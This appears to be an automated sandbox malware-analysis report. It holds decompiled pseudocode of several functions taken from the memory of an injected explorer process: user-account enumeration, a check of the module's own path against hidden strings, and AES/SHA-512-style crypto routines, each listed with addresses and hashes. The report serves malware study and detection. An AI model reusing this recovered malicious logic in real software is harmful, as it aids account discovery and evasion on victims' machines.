				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				char* _v28;
				short _v540;
				void* _v544;
				long _v548;
				long _v552;
				union _SID_NAME_USE _v556;
				void* _t55;
				void* _t87;

				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				while(0 != 0) {
				}
				_v16 = NetUserEnum(_a4, 0, 2,  &_v28, 0xffffffff,  &_v12,  &_v20,  &_v24);
				if(_v16 == 0) {
					_v8 = 0;
					while(_v8 < _v12) {
						_v552 = 0;
						_v548 = 0;
						LookupAccountNameW(0,  *(_v28 + _v8 * 4), 0,  &_v552, 0,  &_v548,  &_v556);
						_t55 = E003F3EE0(_v28, _v552);
						_t87 = _t87 + 4;
						_v544 = _t55;
						if(_v544 != 0) {
							_v548 = 0x200;
							if(LookupAccountNameW(0,  *(_v28 + _v8 * 4), _v544,  &_v552,  &_v540,  &_v548,  &_v556) != 0) {
								_a8( *(_v28 + _v8 * 4), _v544, _a12);
								_t87 = _t87 + 0xc;
								Sleep(0xa);
								L8:
								_v8 = _v8 + 1;
								continue;
							}
							while(0 != 0) {
							}
							goto L8;
						}
						while(0 != 0) {
						}
						goto L8;
					}
					NetApiBufferFree(_v28);
					return 0;
				}
				while(0 != 0) {
				}
				return 0xffffffff;
			}

0x00400ba9
0x00400bb0
0x00400bb7
0x00400bbe
0x00400bc2
0x00400be3
0x00400bea
0x00400bfa
0x00400c0c
0x00400c18
0x00400c22
0x00400c51
0x00400c5e
0x00400c63
0x00400c66
0x00400c73
0x00400c7d
0x00400cbe
0x00400ce0
0x00400ce3
0x00400ce8
0x00400c03
0x00400c09
0x00000000
0x00400c09
0x00400cc0
0x00400cc4
0x00000000
0x00400cc6
0x00400c75
0x00400c79
0x00000000
0x00400c7b
0x00400cf7
0x00000000
0x00400cfc
0x00400bec
0x00400bf0
0x00000000

APIs

NetUserEnum.NETAPI32(?,00000000,00000002,?,000000FF,?,?,?), ref: 00400BDE
LookupAccountNameW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000002,?,000000FF,?,?,?), ref: 00400C51

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

LookupAccountNameW.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 00400CB6
Sleep.KERNEL32(0000000A), ref: 00400CE8
NetApiBufferFree.NETAPI32(?,?,00000000,00000002,?,000000FF,?,?,?), ref: 00400CF7

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: AccountLookupName$AllocBufferEnumFreeHeapSleepUser
String ID:
API String ID: 3227435949-0
Opcode ID: 7597d70128605b6075bc73f77adb421ecca168040cca9febf2afc76c497d6db8
Instruction ID: a86c9311303eb3639756cbb4c6ad283f01f0674e0d5bc70e7cd97f4625c770cd
Opcode Fuzzy Hash: 7597d70128605b6075bc73f77adb421ecca168040cca9febf2afc76c497d6db8
Instruction Fuzzy Hash: 30414DB1904108EBDB14CFD4D999FEEB778AB48304F1042AAE116A72C0D774AF85CF95

Uniqueness

Uniqueness Score: 1.74%

Function 003FB120, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
UNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E003FB120() {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v284;
				signed int _v288;
				char* _v292;
				char* _t27;
				void* _t41;
				void* _t42;

				_v8 = 0;
				_v20 = 0x2677;
				_v16 = 0x2317;
				_v12 = 0x1ece;
				while(0 != 0) {
				}
				GetModuleFileNameA(GetModuleHandleA(0),  &_v284, 0x103);
				_v288 = 0;
				while(_v288 < 3) {
					_t27 = E003F8060( *((intOrPtr*)(_t41 + _v288 * 4 - 0x10)),  *((intOrPtr*)(_t41 + _v288 * 4 - 0x10)));
					_t42 = _t42 + 4;
					_v292 = _t27;
					if(_v292 == 0) {
						L12:
						_v288 = _v288 + 1;
						continue;
					} else {
						if(StrStrIA( &_v284, _v292) == 0) {
							E003F8170( &_v292);
							_t42 = _t42 + 4;
							goto L12;
						} else {
							while(0 != 0) {
							}
							_v8 = 1;
							E003F8170( &_v292);
							L13:
							while(0 != 0) {
							}
							return _v8;
						}
					}
					goto L13;
				}
				goto L13;
			}

0x003fb129
0x003fb130
0x003fb137
0x003fb13e
0x003fb145
0x003fb149
0x003fb160
0x003fb166
0x003fb181
0x003fb195
0x003fb19a
0x003fb19d
0x003fb1aa
0x003fb1f1
0x003fb17b
0x00000000
0x003fb1ac
0x003fb1c2
0x003fb1e9
0x003fb1ee
0x00000000
0x003fb1c4
0x003fb1c4
0x003fb1c8
0x003fb1ca
0x003fb1d8
0x00000000
0x003fb1f6
0x003fb1fa
0x003fb202
0x003fb202
0x003fb1c2
0x00000000
0x003fb1aa
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000103), ref: 003FB159
GetModuleFileNameA.KERNEL32(00000000), ref: 003FB160
StrStrIA.SHLWAPI(?,00000000), ref: 003FB1BA

Strings

w&, xrefs: 003FB130

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Module$FileHandleName
String ID: w&
API String ID: 4146042529-4088035379
Opcode ID: 81bbe2231d7935fded1849b9cb23a139ed7a91833d5d06b31d0665cd3cadad35
Instruction ID: 8850edc7ed74a6d21679f97a609ea3ad6358cbc1d3607536228603287a4e2155
Opcode Fuzzy Hash: 81bbe2231d7935fded1849b9cb23a139ed7a91833d5d06b31d0665cd3cadad35
Instruction Fuzzy Hash: 9E216DF090021CDBDF16DB60DC5ABFEF778BB09304F1441999A05A6641D7749B55CF81

Uniqueness

Uniqueness Score: 100.00%

Function 003F9C00, Relevance: 5.2, Strings: 4, Instructions: 167
UNIQUELIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 64%

			E003F9C00() {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v276;
				signed int _v280;
				char _v284;
				char _t125;
				void* _t159;
				void* _t160;
				void* _t161;

				_v8 = 0;
				_v280 = 0;
				_v276 = 1;
				_v272 = 0x226;
				_v268 = 0;
				_v264 = 0;
				_v260 = 2;
				_v256 = 0x85b;
				_v252 = 0;
				_v248 = 0;
				_v244 = 4;
				_v240 = 0x2b0b;
				_v236 = 0;
				_v232 = 0;
				_v228 = 8;
				_v224 = 0x1f2d;
				_v220 = 0;
				_v216 = 0;
				_v212 = 0x10;
				_v208 = 0x1c66;
				_v204 = 0;
				_v200 = 0;
				_v196 = 0x20;
				_v192 = 0x268a;
				_v188 = 0;
				_v184 = 0;
				_v180 = 0x40;
				_v176 = 0x1a74;
				_v172 = 0;
				_v168 = 0;
				_v164 = 0x80;
				_v160 = 0x1ba7;
				_v156 = 0;
				_v152 = 0;
				_v148 = 0x100;
				_v144 = 0xade;
				_v140 = 0;
				_v136 = 0;
				_v132 = 0x200;
				_v128 = 0x2387;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0x400;
				_v112 = 0x1b1d;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0x800;
				_v96 = 0x2c63;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0x1000;
				_v80 = 0x225f;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0x2000;
				_v64 = 0x1f0f;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0x4000;
				_v48 = 0x279e;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0x8000;
				_v32 = 0x108;
				_v28 = 0;
				_v24 = 0;
				_v280 = 0x10;
				_v8 = 0;
				while(_v8 < _v280) {
					_t125 = E003F8060( *((intOrPtr*)(_t159 + (_v8 << 4) - 0x10c)),  *((intOrPtr*)(_t159 + (_v8 << 4) - 0x10c)));
					_t160 = _t160 + 4;
					_v284 = _t125;
					if(_v284 != 0) {
						 *((intOrPtr*)(_t159 + (_v8 << 4) - 0x104)) = E003F4E30(_v284, 0x3b, 0, _t159 + (_v8 << 4) - 0x108);
						E003F8170( &_v284);
						_t160 = _t160 + 0x14;
					}
					_v8 = _v8 + 1;
				}
				_v12 =  &_v276;
				_v16 = _v280;
				_v20 = 0;
				E003F4290(E003F9B20,  &_v20);
				_t161 = _t160 + 8;
				if(_v20 != 0) {
					while(0 != 0) {
					}
				} else {
					while(0 != 0) {
					}
				}
				_v8 = 0;
				while(_v8 < _v280) {
					if( *((intOrPtr*)(_t159 + (_v8 << 4) - 0x104)) != 0) {
						E003F51C0(_t159 + (_v8 << 4) - 0x104, _t159 + (_v8 << 4) - 0x108);
						_t161 = _t161 + 8;
					}
					_v8 = _v8 + 1;
				}
				return _v20;
			}

0x003f9c09
0x003f9c10
0x003f9c1a
0x003f9c24
0x003f9c30
0x003f9c36
0x003f9c3c
0x003f9c46
0x003f9c52
0x003f9c58
0x003f9c5e
0x003f9c68
0x003f9c74
0x003f9c7a
0x003f9c80
0x003f9c8a
0x003f9c96
0x003f9c9c
0x003f9ca2
0x003f9cac
0x003f9cb8
0x003f9cbe
0x003f9cc4
0x003f9cce
0x003f9cda
0x003f9ce0
0x003f9ce6
0x003f9cf0
0x003f9cfc
0x003f9d02
0x003f9d08
0x003f9d12
0x003f9d1e
0x003f9d24
0x003f9d2a
0x003f9d34
0x003f9d40
0x003f9d46
0x003f9d4c
0x003f9d53
0x003f9d5c
0x003f9d5f
0x003f9d62
0x003f9d69
0x003f9d72
0x003f9d75
0x003f9d78
0x003f9d7f
0x003f9d88
0x003f9d8b
0x003f9d8e
0x003f9d95
0x003f9d9e
0x003f9da1
0x003f9da4
0x003f9dab
0x003f9db4
0x003f9db7
0x003f9dba
0x003f9dc1
0x003f9dca
0x003f9dcd
0x003f9dd0
0x003f9dd7
0x003f9de0
0x003f9de3
0x003f9de6
0x003f9df0
0x003f9e02
0x003f9e1b
0x003f9e20
0x003f9e23
0x003f9e30
0x003f9e59
0x003f9e67
0x003f9e6c
0x003f9e6c
0x003f9dff
0x003f9dff
0x003f9e77
0x003f9e80
0x003f9e83
0x003f9e93
0x003f9e98
0x003f9e9f
0x003f9ea9
0x003f9ead
0x003f9ea1
0x003f9ea1
0x003f9ea5
0x003f9ea7
0x003f9eaf
0x003f9ec1
0x003f9eda
0x003f9ef8
0x003f9efd
0x003f9efd
0x003f9ebe
0x003f9ebe
0x003f9f08

Strings

_", xrefs: 003F9D95
, xrefs: 003F9CC4
c,, xrefs: 003F9D7F
@, xrefs: 003F9CE6

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: $@$_"$c,
API String ID: 0-851856876
Opcode ID: aefc54b20f9cd939f44b0a29a80b13d2b781f08958807400f43a80460cabc4cf
Instruction ID: 063a28975a61e11b4ca902de6b1bdd68b77703b2eb4a6ec4236ce5de0b5e4918
Opcode Fuzzy Hash: aefc54b20f9cd939f44b0a29a80b13d2b781f08958807400f43a80460cabc4cf
Instruction Fuzzy Hash: 0381D4B0D0421CDBEB68CF99D9457EEBBF1BB48304F2081AAD10DA7240D7B55A88CF55

Uniqueness

Uniqueness Score: 100.00%

Function 01511112, Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E01511112(void* __ecx, signed char* _a4, unsigned int _a8, void* _a12) {
				signed int _v8;
				signed int _t153;
				signed int _t183;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				signed int _t226;
				signed int _t228;
				void* _t231;
				intOrPtr _t237;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t276;
				signed int _t278;
				unsigned int _t281;
				signed int _t284;
				signed int* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				intOrPtr* _t288;
				intOrPtr* _t289;
				intOrPtr* _t290;
				intOrPtr* _t291;
				intOrPtr* _t292;
				intOrPtr* _t293;
				signed int _t295;
				signed int* _t296;
				signed int* _t297;
				signed int _t328;
				signed int _t333;
				signed int _t356;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				signed char* _t372;
				signed int* _t374;
				intOrPtr* _t375;
				intOrPtr* _t376;
				intOrPtr* _t377;
				intOrPtr* _t378;
				intOrPtr* _t379;
				intOrPtr* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int* _t383;
				signed int* _t385;
				void* _t388;

				_push(__ecx);
				_t372 = _a4;
				if(_t372 == 0) {
					L22:
					_push(0xfffffffa);
					goto L23;
				} else {
					_t388 = _a12;
					if(_t388 == 0) {
						goto L22;
					} else {
						_t281 = _a8;
						if(_t281 == 0x10 || _t281 == 0x18 || _t281 == 0x20) {
							memset(_t388, 0, 0x204);
							 *((intOrPtr*)(_t388 + 0x200)) = (_t281 >> 3) + (_t281 >> 3) + 6;
							 *_t388 = ((( *_t372 & 0x000000ff) << 0x00000008 | _t372[1] & 0x000000ff) << 0x00000008 | _t372[2] & 0x000000ff) << 0x00000008 | _t372[3] & 0x000000ff;
							 *(_t388 + 4) = (((_t372[4] & 0x000000ff) << 0x00000008 | _t372[5] & 0x000000ff) << 0x00000008 | _t372[6] & 0x000000ff) << 0x00000008 | _t372[7] & 0x000000ff;
							 *(_t388 + 8) = (((_t372[8] & 0x000000ff) << 0x00000008 | _t372[9] & 0x000000ff) << 0x00000008 | _t372[0xa] & 0x000000ff) << 0x00000008 | _t372[0xb] & 0x000000ff;
							_t183 = (((_t372[0xc] & 0x000000ff) << 0x00000008 | _t372[0xd] & 0x000000ff) << 0x00000008 | _t372[0xe] & 0x000000ff) << 0x00000008 | _t372[0xf] & 0x000000ff;
							 *(_t388 + 0xc) = _t183;
							if(_a8 != 0x10) {
								if(_a8 != 0x18) {
									if(_a8 != 0x20) {
										_t153 = _t183 | 0xffffffff;
									} else {
										 *(_t388 + 0x10) = (((_t372[0x10] & 0x000000ff) << 0x00000008 | _t372[0x11] & 0x000000ff) << 0x00000008 | _t372[0x12] & 0x000000ff) << 0x00000008 | _t372[0x13] & 0x000000ff;
										 *(_t388 + 0x14) = (((_t372[0x14] & 0x000000ff) << 0x00000008 | _t372[0x15] & 0x000000ff) << 0x00000008 | _t372[0x16] & 0x000000ff) << 0x00000008 | _t372[0x17] & 0x000000ff;
										 *(_t388 + 0x18) = (((_t372[0x18] & 0x000000ff) << 0x00000008 | _t372[0x19] & 0x000000ff) << 0x00000008 | _t372[0x1a] & 0x000000ff) << 0x00000008 | _t372[0x1b] & 0x000000ff;
										_v8 = 0x3c;
										 *(_t388 + 0x1c) = (((_t372[0x1c] & 0x000000ff) << 0x00000008 | _t372[0x1d] & 0x000000ff) << 0x00000008 | _t372[0x1e] & 0x000000ff) << 0x00000008 | _t372[0x1f] & 0x000000ff;
										_t214 = E01511057((((_t372[0x1c] & 0x000000ff) << 0x00000008 | _t372[0x1d] & 0x000000ff) << 0x00000008 | _t372[0x1e] & 0x000000ff) << 0x00000008 | _t372[0x1f] & 0x000000ff) ^  *_t388 ^ 0x01000000;
										_t284 =  *(_t388 + 4) ^ _t214;
										 *(_t388 + 0x20) = _t214;
										_t216 =  *(_t388 + 8) ^ _t284;
										_a4 = 0xffffffd0;
										_a4 = _a4 - _t388;
										 *(_t388 + 0x24) = _t284;
										 *(_t388 + 0x28) = _t216;
										 *(_t388 + 0x2c) =  *(_t388 + 0xc) ^ _t216;
										_t374 = _t388 + 0x30;
										_t285 = 0x152bbcc;
										do {
											asm("ror ecx, 0x8");
											_t218 = E01511057( *(_t374 - 4)) ^  *(_t374 - 0x20);
											_t328 =  *(_t374 - 0x1c) ^ _t218;
											 *_t374 = _t218;
											_t220 =  *(_t374 - 0x18) ^ _t328;
											_t374[1] = _t328;
											_t374[2] = _t220;
											_t374[3] =  *(_t374 - 0x14) ^ _t220;
											_t374 =  &(_t374[8]);
											_t226 = E01511057( *((intOrPtr*)(_t388 + 0x1c + ( &(_a4[_t374]) >> 2) * 4))) ^  *(_t374 - 0x30) ^  *_t285;
											_t285 =  &(_t285[1]);
											 *(_t374 - 0x10) = _t226;
											_t333 =  *(_t374 - 0x2c) ^ _t226;
											 *(_t374 - 0xc) = _t333;
											_t228 =  *(_t374 - 0x28) ^ _t333;
											 *(_t374 - 8) = _t228;
											 *(_t374 - 4) =  *(_t374 - 0x24) ^ _t228;
										} while (_t285 != 0x152bbe4);
										goto L17;
									}
								} else {
									 *(_t388 + 0x10) = (((_t372[0x10] & 0x000000ff) << 0x00000008 | _t372[0x11] & 0x000000ff) << 0x00000008 | _t372[0x12] & 0x000000ff) << 0x00000008 | _t372[0x13] & 0x000000ff;
									_v8 = 0x34;
									 *(_t388 + 0x14) = (((_t372[0x14] & 0x000000ff) << 0x00000008 | _t372[0x15] & 0x000000ff) << 0x00000008 | _t372[0x16] & 0x000000ff) << 0x00000008 | _t372[0x17] & 0x000000ff;
									_t255 = E01511057((((_t372[0x14] & 0x000000ff) << 0x00000008 | _t372[0x15] & 0x000000ff) << 0x00000008 | _t372[0x16] & 0x000000ff) << 0x00000008 | _t372[0x17] & 0x000000ff) ^  *_t388 ^ 0x01000000;
									_t295 =  *(_t388 + 4) ^ _t255;
									 *(_t388 + 0x18) = _t255;
									_t257 =  *(_t388 + 8) ^ _t295;
									_a4 = 0xffffffd8;
									_a4 = _a4 - _t388;
									 *(_t388 + 0x1c) = _t295;
									 *(_t388 + 0x20) = _t257;
									 *(_t388 + 0x24) =  *(_t388 + 0xc) ^ _t257;
									_t383 = _t388 + 0x28;
									_t296 = 0x152bbcc;
									do {
										_t259 =  *(_t383 - 0x18) ^  *(_t383 - 4);
										 *_t383 = _t259;
										_t383[1] =  *(_t383 - 0x14) ^ _t259;
										_t383 =  &(_t383[6]);
										_t265 = E01511057( *((intOrPtr*)(_t388 + 0x14 + ( &(_a4[_t383]) >> 2) * 4))) ^  *(_t383 - 0x28) ^  *_t296;
										_t296 =  &(_t296[1]);
										 *(_t383 - 0x10) = _t265;
										_t356 =  *(_t383 - 0x24) ^ _t265;
										 *(_t383 - 0xc) = _t356;
										_t267 =  *(_t383 - 0x20) ^ _t356;
										 *(_t383 - 8) = _t267;
										 *(_t383 - 4) =  *(_t383 - 0x1c) ^ _t267;
									} while (_t296 != 0x152bbe8);
									goto L17;
								}
							} else {
								_v8 = 0x2c;
								_t270 = E01511057(_t183) ^  *_t388 ^ 0x01000000;
								_t361 =  *(_t388 + 4) ^ _t270;
								 *(_t388 + 0x10) = _t270;
								_t272 =  *(_t388 + 8) ^ _t361;
								 *(_t388 + 0x18) = _t272;
								 *(_t388 + 0x14) = _t361;
								 *(_t388 + 0x1c) = _t272 ^ _t183;
								_t385 = _t388 + 4;
								_t297 = 0x152bbcc;
								do {
									_t362 = _t385[6];
									_t385 =  &(_t385[4]);
									_t276 = E01511057(_t362) ^  *(_t385 - 4) ^  *_t297;
									_t297 =  &(_t297[1]);
									_t385[3] = _t276;
									_t364 =  *_t385 ^ _t276;
									_t385[4] = _t364;
									_t278 = _t385[1] ^ _t364;
									_t385[5] = _t278;
									_t385[6] = _t385[2] ^ _t278;
								} while (_t297 != 0x152bbf0);
								L17:
								_t375 = _t388 + _v8 * 4 - 0x10;
								_t286 = _t388 + 0x100;
								 *_t286 =  *_t375;
								_t231 = 4;
								_t376 = _t375 + _t231;
								_t287 = _t286 + _t231;
								 *_t287 =  *_t376;
								_t377 = _t376 + _t231;
								_t288 = _t287 + _t231;
								 *_t288 =  *_t377;
								_t378 = _t377 + _t231;
								_t289 = _t288 + _t231;
								 *_t289 =  *_t378;
								_t290 = _t289 - 0xc;
								_t379 = _t378 - 0xc;
								_a4 = 1;
								if( *((intOrPtr*)(_t388 + 0x200)) > 1) {
									do {
										_t379 = _t379 - 0x10;
										_t290 = _t290 + 0x10;
										 *_t290 = E015110A8( *_t379);
										 *((intOrPtr*)(_t290 + 4)) = E015110A8( *((intOrPtr*)(_t379 + 4)));
										 *((intOrPtr*)(_t290 + 8)) = E015110A8( *((intOrPtr*)(_t379 + 8)));
										_t237 = E015110A8( *((intOrPtr*)(_t379 + 0xc)));
										_a4 =  &(_a4[1]);
										 *((intOrPtr*)(_t290 + 0xc)) = _t237;
									} while (_a4 <  *((intOrPtr*)(_t388 + 0x200)));
									_t231 = 4;
								}
								_t380 = _t379 - 0x10;
								_t291 = _t290 + 0x10;
								 *_t291 =  *_t380;
								_t381 = _t380 + _t231;
								_t292 = _t291 + _t231;
								 *_t292 =  *_t381;
								_t293 = _t292 + _t231;
								_t382 = _t381 + _t231;
								 *_t293 =  *_t382;
								 *((intOrPtr*)(_t293 + 4)) =  *((intOrPtr*)(_t382 + 4));
								_t153 = 0;
							}
						} else {
							_push(0xffffffeb);
							L23:
							_pop(_t153);
						}
					}
				}
				return _t153;
			}

0x01511115
0x01511119
0x0151111e
0x0151152b
0x0151152b
0x00000000
0x01511124
0x01511124
0x01511129
0x00000000
0x0151112f
0x0151112f
0x01511135
0x01511150
0x0151115c
0x01511180
0x015111a1
0x015111c3
0x015111e3
0x015111ec
0x015111ef
0x01511266
0x0151134a
0x01511526
0x01511350
0x0151136f
0x01511391
0x015113b3
0x015113d7
0x015113de
0x015113ee
0x015113f3
0x015113f5
0x015113fb
0x015113ff
0x01511406
0x01511409
0x0151140c
0x0151140f
0x01511412
0x01511415
0x0151141a
0x0151141d
0x01511425
0x0151142b
0x0151142d
0x01511432
0x01511434
0x0151143c
0x01511442
0x01511445
0x01511459
0x0151145b
0x0151145e
0x01511464
0x01511466
0x0151146c
0x0151146e
0x01511476
0x01511479
0x00000000
0x0151141a
0x0151126c
0x0151128b
0x015112af
0x015112b6
0x015112c6
0x015112cb
0x015112cd
0x015112d3
0x015112d7
0x015112de
0x015112e1
0x015112e4
0x015112e7
0x015112ea
0x015112ed
0x015112f2
0x015112f5
0x015112fd
0x01511302
0x01511305
0x01511319
0x0151131b
0x0151131e
0x01511324
0x01511326
0x0151132c
0x0151132e
0x01511336
0x01511339
0x00000000
0x01511341
0x015111f1
0x015111f5
0x01511206
0x0151120b
0x0151120d
0x01511213
0x01511215
0x0151121a
0x0151121d
0x01511220
0x01511223
0x01511228
0x01511228
0x0151122b
0x01511236
0x01511238
0x0151123b
0x01511240
0x01511242
0x01511248
0x0151124a
0x01511252
0x01511255
0x01511481
0x01511484
0x0151148a
0x01511490
0x01511494
0x01511495
0x01511499
0x0151149b
0x0151149d
0x015114a1
0x015114a3
0x015114a5
0x015114a9
0x015114ab
0x015114b0
0x015114b3
0x015114b6
0x015114bf
0x015114c1
0x015114c1
0x015114c6
0x015114ce
0x015114d8
0x015114e3
0x015114e9
0x015114ee
0x015114f1
0x015114f7
0x01511501
0x01511501
0x01511502
0x01511507
0x0151150a
0x0151150c
0x01511510
0x01511512
0x01511514
0x01511516
0x0151151a
0x0151151f
0x01511522
0x01511522
0x01511141
0x01511141
0x0151152d
0x0151152d
0x0151152d
0x01511135
0x01511129
0x01511532

APIs

memset.MSVCRT(?,00000000,00000204), ref: 01511150

Strings

<, xrefs: 015113D7
, xrefs: 01511346

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: $<
API String ID: 2221118986-428540627
Opcode ID: 5b58aa655d3be8656ec5e304a11a9ef0488b6163264e61f85be758232ca95dbc
Instruction ID: c76b8c2e8a990bca8d40878b9e17058805ca0384ddba800a388d6b3acb3fb523
Opcode Fuzzy Hash: 5b58aa655d3be8656ec5e304a11a9ef0488b6163264e61f85be758232ca95dbc
Instruction Fuzzy Hash: 86E14DB0614A529FD769CF3DC8D0625FBF0BF893017048A6EE5AACB641D778E650CB90

Uniqueness

Uniqueness Score: 7.75%

Function 01512AD6, Relevance: 2.8, Strings: 2, Instructions: 295
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E01512AD6(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void _v80;
				signed int _v84;
				char _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				void* _v108;
				char _v636;
				void* _t213;
				signed int _t215;
				signed int* _t224;
				signed int _t225;
				unsigned int _t227;
				signed int _t233;
				void* _t248;
				unsigned int _t264;
				unsigned int _t270;
				unsigned int _t272;
				signed int _t279;
				signed char* _t282;
				signed int _t285;
				signed int _t307;
				signed int _t308;
				signed int _t319;
				signed int _t365;
				signed int _t367;
				signed int _t369;
				signed int _t371;
				signed int _t373;
				signed int _t375;
				signed int _t391;
				signed int _t393;
				void* _t399;
				signed int _t400;
				unsigned int _t426;
				void* _t438;

				_t308 = __edx;
				_t213 = __eax;
				_t1 = _t213 + 8; // 0x80
				_t399 = _t1;
				_v108 = _t399;
				_t279 = 0x10;
				memcpy( &_v80, _t399, _t279 << 2);
				_t400 = 0;
				_t282 = _a4 + 2;
				do {
					_t215 =  *(_t282 - 2) & 0x000000ff;
					asm("cdq");
					_t308 = (_t308 << 0x00000020 | _t215) << 8;
					asm("cdq");
					_t365 = _t215 << 0x00000008 |  *(_t282 - 1) & 0x000000ff;
					asm("cdq");
					_t367 = _t365 << 0x00000008 |  *_t282 & 0x000000ff;
					asm("cdq");
					_t369 = _t367 << 0x00000008 | _t282[1] & 0x000000ff;
					asm("cdq");
					_t371 = _t369 << 0x00000008 | _t282[2] & 0x000000ff;
					asm("cdq");
					_t373 = _t371 << 0x00000008 | _t282[3] & 0x000000ff;
					asm("cdq");
					_t375 = _t373 << 0x00000008 | _t282[4] & 0x000000ff;
					asm("cdq");
					 *(_t438 + _t400 * 8 - 0x2e8) = _t375 << 0x00000008 | _t282[5] & 0x000000ff;
					 *(_t438 + _t400 * 8 - 0x2e4) = ((((((((((((_t308 | _t308) << 0x00000020 | _t365) << 0x8 | _t308) << 0x00000020 | _t367) << 0x8 | _t308) << 0x00000020 | _t369) << 0x8 | _t308) << 0x00000020 | _t371) << 0x8 | _t308) << 0x00000020 | _t373) << 0x8 | _t308) << 0x00000020 | _t375) << 0x8 | _t308;
					_t400 = _t400 + 1;
					_t282 =  &(_t282[8]);
				} while (_t400 < 0x10);
				_t224 =  &_v636;
				_v8 = _t224;
				_v92 = 0x40;
				do {
					_v16 =  *((intOrPtr*)(_t224 - 0x68));
					_v12 =  *((intOrPtr*)(_t224 - 0x64));
					_t285 =  *_t224;
					_t225 = _t224[1];
					_t264 = _t225;
					_v100 = _t285;
					_v96 = _t225;
					_t227 = _v96;
					_v104 = (_t264 << 0x00000020 | _t285) >> 0x13 ^ (_t225 >> 0x0000001d | _t285 << 0x00000003) ^ (_t227 << 0x00000020 | _v100) >> 0x6;
					_v84 = (_t285 << 0x0000000d | _t264 >> 0x00000013) ^ (_t225 << 0x00000020 | _t285) << 0x3 ^ _t227 >> 0x00000006;
					_t233 = _v8;
					asm("adc edx, ecx");
					asm("adc edx, [eax-0x6c]");
					asm("adc edx, [eax-0x24]");
					 *((intOrPtr*)(_t233 + 0x10)) = _v104 + ((_v12 << 0x00000020 | _v16) >> 0x8 ^ (_v12 << 0x00000020 | _v16) >> 0x1 ^ (_v12 << 0x00000020 | _v16) >> 0x7) +  *((intOrPtr*)(_t233 - 0x70)) +  *((intOrPtr*)(_t233 - 0x28));
					 *((intOrPtr*)(_t233 + 0x14)) = _v84;
					_t224 = _t233 + 8;
					_t97 =  &_v92;
					 *_t97 = _v92 - 1;
